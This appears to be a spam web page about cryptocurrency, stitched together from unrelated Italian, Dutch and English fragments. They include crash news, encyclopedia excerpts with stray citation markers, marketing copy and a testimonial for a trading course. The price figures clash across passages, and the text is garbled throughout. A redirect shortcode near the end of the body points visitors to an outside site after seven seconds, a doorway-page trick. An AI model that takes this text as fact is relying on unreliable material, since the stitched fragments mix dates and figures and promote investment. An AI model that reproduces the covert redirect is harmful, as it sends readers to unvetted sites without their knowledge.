“Criptovaluta News Feed |Traders di valute digitali”

Nel momento in cui vi scriviamo i valori delle tre maggiori criptovalute sono i seguenti: Bitcoin sotto gli 11 mila dollari, Ethereum sotto quota $1.000, Ripple a 1 dollaro. Per Ethereum e Ripple, sembra di essere tornati indietro quasi di un mese. Ancora più negativo il calo del Bitcoin. Quello di ieri passerà alla storia, probabilmente, come il martedì nero delle criptovalute. Rispetto alle ultime 24 ore, le prime dieci criptomonete per coinmarketcap.com, il sito che classifica le monete virtuali in base alla loro capitalizzazione azionaria, hanno fatto registrare crolli tra il 20 e 35 per cento. Un bagno di sangue.

Ancora più felice è forse chi si occupa di produrre tali chip, come la taiwanese TSMC, che vede nel mining una nuova grande opportunità di incasso. Oltre alla maggiore produzione di GPU, TSMC sta raccogliendo moltissimi di ordini per la realizzazione di ASIC dedicati al mining dalla cinese Bitmain Technologies.

Amazon, l’insaziabile. È così che molti siti di tecnologia hanno commentato l’ultima mossa del colosso di Seattle: coniare una propria moneta chiamata, molto modestamente, Amazon Coin. La company fond…

Minister van financien wil ICO’s en handel in cryptocurrency strenger gaan reguleren – [image: Minister van financien wil ICO’s en cryptocurrency strenger gaan reguleren.] De Minister van financien, Wopke Hoekstra, heeft aangegeven dat hi…

Le criptovalute non sono monete fisiche, ma sono solo elettroniche, ovvero un asset digitale che rimane sotto forma di dato. La tecnologia che sta dietro alle criptovalute controlla in gran parte il suo valore, e determina il protocollo di identificazione e trasferimento del denaro.

Alcune ICO si sono rivelate davvero delle truffe, come per esempio Confido, e per questo motivo fondamentale per Cardano è stato l’apporto di Charles Hoskinson. Dal momento che Ethereum è un progetto che ha funzionato e continua a crescere (la criptovaluta ha da poco superato i 1.000$), la presenza in Cardano dell’ex co-fondatore di Ethereum ha portato sicurezza agli investitori.

A guardare il logo, circondato da scritte colorate e senza senso, potrebbe sembrare uno scherzo. E invece è tutto vero: nell’affollatissimo mondo delle valute digitali, capitanate dal Bitcoin , è arrivato anche il Dogecoin, un omaggio al meme che impazza un po’ ovunque in Rete e che vede protagonista un docile cane di razza Shiba. Creata da Jackson Palmer e Billy Markus, questa criptovaluta si è guadagnata un suo spazio soprattutto grazie alla community “Dogemarket” su Reddit, un luogo dove scambiare, comprare e vendere non solo Dogecoin ma anche Bitcoin e oggetti reali.

Ethereum. E’ tra le ultime nate per il trading sulle criptovalute, il suo esordio infatti è nel 2015. Da un prezzo di esordio di soli 2 dollari e mezzo, ad oggi ( maggio 2017 )  tale asset digitale è quotato su valori di circa 161 dollari.

In particolare, ogni nodo “generatore” raccoglie tutte le transazioni non confermate che conosce in un “blocco” candidato, un file che, tra le altre cose,[38] contiene un hash crittografico del precedente blocco valido conosciuto a quel nodo. Prova poi a riprodurre un hash di quel blocco con determinate caratteristiche, uno sforzo che richiede in media una quantità definibile di prove da dover effettuare. Quando un nodo trova tale soluzione la annuncia al resto della rete, i peer che ricevono il blocco ne controllano la validità prima di accettarlo e poi aggiungerlo alla catena.

Hello my lovely Crypto-Family D4rkEnergY has an amazing time. D4 is working hard to keep you guys updated with the market situation. But D4 loves what he is doing, and that is indeed the most important thing. D4rkEnergY is here to serve you. D4 is here to spread love and wisdom, so you guys can succeed in trading and in life <3 Let's jump in and a look at ... Voor de meeste mensen die geld willen verdienen met blockchain, is investeren in cryptocurrencies de meest logische stap: Simpelweg komt dit neer op het kopen van een cryptocurrency en deze weer verkopen nadat de cryptomunt in waarde is gestegen. Om te starten met handelen in cryptocurrency neemt u de volgende stappen: Non rivelare mai a nessuno la tua chiava privata: se il nostro indirizzo pubblico può essere condiviso liberamente con chiunque, lo stesso non vale per la chiave privata. Chiunque ne entri in possesso può infatti avere pieno accesso al nostro wallet. Anonymous Internet banking Bitcoin network Complementary currency Crypto-anarchism Cryptocurrency exchange Digital currency Double-spending Electronic money Initial coin offering Airdrop Virtual currency South Korea plans national digital currency using a Blockchain.[55] The chairman of South Korea’s Financial Services Commission (FSC), Yim Jong-yong, announced that his department will "Lay the systemic groundwork for the spread of digital currency."[55] South Korea has already announced plans to discontinue coins by the year 2020.[56] Come con le classiche valute, le istituzioni finanziarie possono creare sempre più denaro, creando quindi più inflazione (secondo la teoria monetarista: l’inflazione deriva dall’espansione senza controllo dell’offerta di moneta da parte delle banche centrali). A conferma del nuovo trend di investimento in atto nel mondo, nell'ultima parte del 2017, un gruppo di banche giapponesi ha annunciato l'inizio di un progetto [VIDEO] volto a sperimentare l'uso della moneta digitale Xrp per le loro transazioni. Dal novembre 2013 l'Università di Nicosia, a Cipro, accetta il bitcoin come mezzo di pagamento delle tasse universitarie.[15] A partire dal primo luglio 2016, nella città di Zugo, capitale di uno dei Cantoni più ricchi della Svizzera, è possibile pagare in bitcoin alcuni servizi pubblici, tra cui la sanità e i trasporti.[16] Alcuni commercianti, utilizzando siti di cambio, permettono di cambiare bitcoin in diverse valute, ivi compresi dollari statunitensi, euro, rubli russi e yen giapponesi.[17] Secondo il suo creatore, i più grandi vantaggi di Ethereum rispetto al Bitcoin sono la scalabilità, ossia la possibilità di “crescere” in funzione delle necessità, e la flessibilità, cioè la capacità di ospitare le applicazioni più disparate sulla blockchain. Due esempi possono aiutare a spiegare meglio i concetti. In un secondo si riescono a “scrivere” sul registro di Ethereum al massimo circa 15 transazioni. Il doppio di quelle annotabili sul libro mastro di Bitcoin, ma un numero ancora molto lontano dalle 45 mila registrate da Visa nello stesso tempo. Come si può pensare di rivoluzionare il mondo con un sistema così lento? A differenza di quello di Bitcoin, rigido e orfano del suo creatore, l’algoritmo di Ethereum è però più facile da modificare: Buterin ha garantito che, grazie ad alcune migliorie, in un paio di anni raggiungerà i livelli di Visa, riuscirà cioè a “scalare”. Te end of fiat money is near! Here you can find the most complete and clear information about cryptocurrency, the new digital money. No third party needed because of the blockchain! What the blockchain technology will bring us, nobody exactly knows. But the new Google, Snapchat or Facebooks are the one which implent this technology at first and the best. 2015 Active IOTA IOT, MIOTA[57] David Sønstebø, Sergey Ivancheglo, Dominik Schiener and Dr. Serguei Popov SHA-3 Java[58] Directed acyclic graph The first cryptocurrency using the Tangle, a next generation blockchain, as distributed ledger technology. Bitcoin (codice: BTC o XBT) è una criptovaluta e un sistema di pagamento mondiale creato nel 2009 da un anonimo inventore, noto con lo pseudonimo di Satoshi Nakamoto, che sviluppò un'idea da lui stesso presentata su Internet a fine 2008.[1] Per convenzione se il termine Bitcoin è utilizzato con l'iniziale maiuscola si riferisce alla tecnologia e alla rete, mentre se minuscola (bitcoin) si riferisce alla valuta in sé.[2] In questa catena, la cui integrità e la sequenza cronologica vengono garantite tramite la crittografia, sono registrate tutte le contabilizzazioni confermate. Sulla base di queste informazioni il client calcola lo stato del conto Bitcoin. Il concetto di sicurezza del sistema open source non si contraddistingue solo per la codifica dei file di dati: ogni singola transazione passa per una protezione particolare sotto forma di una firma digitale. Questa viene prodotta in automatico da parte di colui che invia i bitcoin attraverso una catena di blocchi segreta, ovvero la chiave privata, a cui ci si riferisce anche come Seed. Op coinbeurs.nl kunt u alle informatie vinden over het kopen en verkopen van digitale valuta, de beschikbare beurzen, de soorten coins die er zijn en uitleg over de digitale portemonnee en digitaal geld in 't algemeen. L’analisi tecnica è basata soprattutto su dati storici e parte dal presupposto che i valori tendono a ripetersi seguendo una certa tendenza nel tempo. All’interno di questa tendenza possono esservi delle oscillazioni che però non inficiano l’andamento globale. 2015 Active Tether USDT Jan Ludovicus van der Velde[43] Omnicore [44] PoW Tether is backed by the USD so that one tether is exactly equal to $1USD. It is commonly used to convert other cryptocurrencies to USD. [45] Le criptomonete sono anche meno soggette al sequestro da parte delle forze dell’ordine e non si viene costrette ad utilizzare intermediari per le transazioni come con Paypal. Tutte le criptovalute sono pseudo-anonime, e alcune monete hanno aggiunto funzionalità per creare del vero anonimato. Our mission is to empower people around the world by bringing blockchain transactions into everyday life. Verge currency makes it possible to engage in direct transactions quickly, efficiently and privately. With Verge currency, businesses and individuals have flexible options for sending and receiving payments. With the flip of a switch, we offer helpful integrations and tools that enable them to handle large scale transactions between merchants and small scale private payments. Marco l'ho ascoltato in diverse occasioni alle conferenze in cui lui era speaker. Lavoriamo nello stesso settore e ho trovato i suoi interventi sempre molto appassionati, tipici di chi va a fondo su un argomento perché vuole conoscere il più possibile una cosa prima di poterla eventualmente utilizzare nel lavoro di tutti i giorni. Poi tramite Facebook e YouTube ho scoperto un "nuovo Marco", o meglio, sempre la stessa passione, ma su un argomento diverso: il trading finanziario Non avendo alcuna esperienza di trading mi sono incuriosito e ho voluto capirne qualcosa anche io, soprattutto vedendolo dal punto di vista di chi non fa il trader per 8-10 ore al giorno ma di chi come me fa altro nella vita (ed è pure molto impegnato...). Non potendo partecipare ai workshop che organizza di tanto in tanto, come ho saputo che stava preparando questo corso online, mi sono subito prenotato. E riecco, quindi, il "solito Marco" buttarsi a capofitto nel raccontarci la sua esperienza personale (ormai decennale) e spiegarci cosa lui considera profittevole e cosa no, non in base a statistiche fatte da altri ma dalle sue esperienze dirette: "questo funziona... questo statene alla larga... etc.”. Concetti forse complicati nei loro meccanismi fondamentali, ma tradotti in parole semplici da farceli capire e soprattutto utilizzare. Mi è subito piaciuto il suo approccio: piedi per terra; minimizzare i rischi; proteggere il capitale; massima attenzione; testare, testare e poi ri-testare... e non tutte quelle cretinate che spesso si vedono pubblicizzate su Internet di diventare milionari in 2 mesi (se invece è quello che state cercando, andate a buttare i vostri soldi altrove, qui si investe, punto). Già dopo un mese mi sono reso conto che stava offrendoci molto più materiale e molta più disponibilità di quanta, forse, lui stesso aveva inizialmente pianificato. Ho partecipato a qualche lezione gratuita di traders americani e inglesi che per importi molto superiori offrono a malapena l'equivalente di un paio dei moduli che Marco ci ha preparato. Einstein diceva: "Non hai davvero compreso qualcosa, fino a quando non sei in grado di spiegarla a tua nonna”. Ecco: fate partecipare vostra nonna a questo corso e diventerà un trader migliore di voi! Nel mondo delle criptovalute sei tu la tua banca! Non ci sono autorità centrali o intermediari che mantengono il tuo "conto" (chiamato Wallet): hai tutta la libertà che vuoi per gestire i tuoi fondi, ma devi imparare a farlo responsabilmente e con cognizione di causa, perchè nella Blockhain non esiste il pulsante "annulla". Infine a completare questa panoramica c’è Qtum, una criptovaluta che si presenta come un ibrido tra Ethereum e Bitcoin, in quanto utilizza la Virtual Machine del primo (lo strumento che permette la scrittura di smart contract) su una versione modificata della blockchain del secondo. Questa particolare combinazione permette a Qtum di usufruire degli aggiornamenti tecnologici di entrambe le “sorelle maggiori”, come Lightning Network (Bitcoin) e Raiden (Ethereum). LA CORSA DI ETHEREUM. Nel frattempo, un’altra moneta digitale sta prendendo piede all’ombra del Bitcoin. Si chiama Ethereum (Eth) e in 12 mesi il suo valore è cresciuto addirittura di 100 volte, passando da circa 8 a più di 800 dollari. Con la sorella maggiore questa cripto-valuta condivide la tecnologia portante, la blockchain, sistema che consente di effettuare in modo sicuro e immodificabile transazioni fra persone che non si conoscono e/o non si fidano l’una dell’altra. [redirect url='http://curbee.info/bump' sec='7']

One thought on ““Criptovaluta News Feed |Traders di valute digitali””

  1. According to the Bank For International Settlements’ November 2015 “Digital currencies” report, it is an asset represented in digital form and having some monetary characteristics.[14] Digital currency can be denominated to a sovereign currency and issued by the issuer responsible to redeem digital money for cash. In that case, digital currency represents electronic money (e-money). Digital currency denominated in its own units of value or with decentralized or automatic issuance will be considered as a virtual currency.
    Rispetto al Bitcoin, Ethereum è stata pensata come uno strumento per le transazioni tra imprese. In pratica, Buterin ha messo a punto un protocollo di fiducia su cui costruire contratti tra due parti, che si possono applicare in settori completamente differenti tra loro, dalla finanza all’energia, passando dall’istruzione, senza la necessità di intermediari (vedi notai per esempio).
    A questo punto la transazione non è più modificabile ed entra a far parte di questo registro delle transazioni, che in gergo prende il nome di “blockchain”. Compito di confermare le transazioni è dei “miner“, che mettono a disposizione della rete la potenza di calcolo dei propri computer (che serve per gestire la rete di una criptovaluta e confermare le transazioni).

Leave a Reply

Your email address will not be published. Required fields are marked *